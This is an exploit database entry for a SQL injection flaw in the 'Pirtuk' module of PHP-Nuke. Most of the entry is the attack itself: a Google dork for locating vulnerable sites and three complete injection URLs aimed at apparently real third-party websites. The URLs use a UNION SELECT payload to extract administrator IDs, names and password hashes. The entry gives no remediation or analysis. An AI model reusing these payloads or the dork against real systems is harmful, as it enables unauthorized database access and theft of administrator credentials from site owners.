PHP-NUKE - 'Pirtuk' Module SQL injection Vulnerability

2011-05-07T00:00:00
ID 1337DAY-ID-15933
Type zdt
Reporter Scientist
Modified 2011-05-07T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: [PHP-NUKE - 'Pirtuk' Module SQL injection Vulnerability]
# Date: [06.0.2011]
# Author: [Scientist]
# Category: [webapps]
# Google dork: [inurl:name=Pirtuk]
# Tested on: [linux]
# Demo site:
[
http://www.zazaistan.com/modules.php?op=modload&name=Pirtuk&file=index&l_op=viewlink&cid=11+and+1=0+union+select+concat%28aid,0x3a,name,0x3a,pwd%29,2+from+zazii23_authors--
http://www.imrak.rebir.com/modules.php?op=modload&name=Pirtuk&file=index&l_op=viewlink&cid=11+and+1=0+union+select+concat%28aid,0x3a,name,0x3a,pwd%29,2+from+zazii23_authors--
http://ww.kurdis.net/modules.php?op=modload&name=Pirtuk&file=index&l_op=viewlink&cid=11+and+1=0+union+select+concat%28aid,0x3a,name,0x3a,pwd%29,2+from+zazii23_authors--
]



#  0day.today [2018-02-19]  #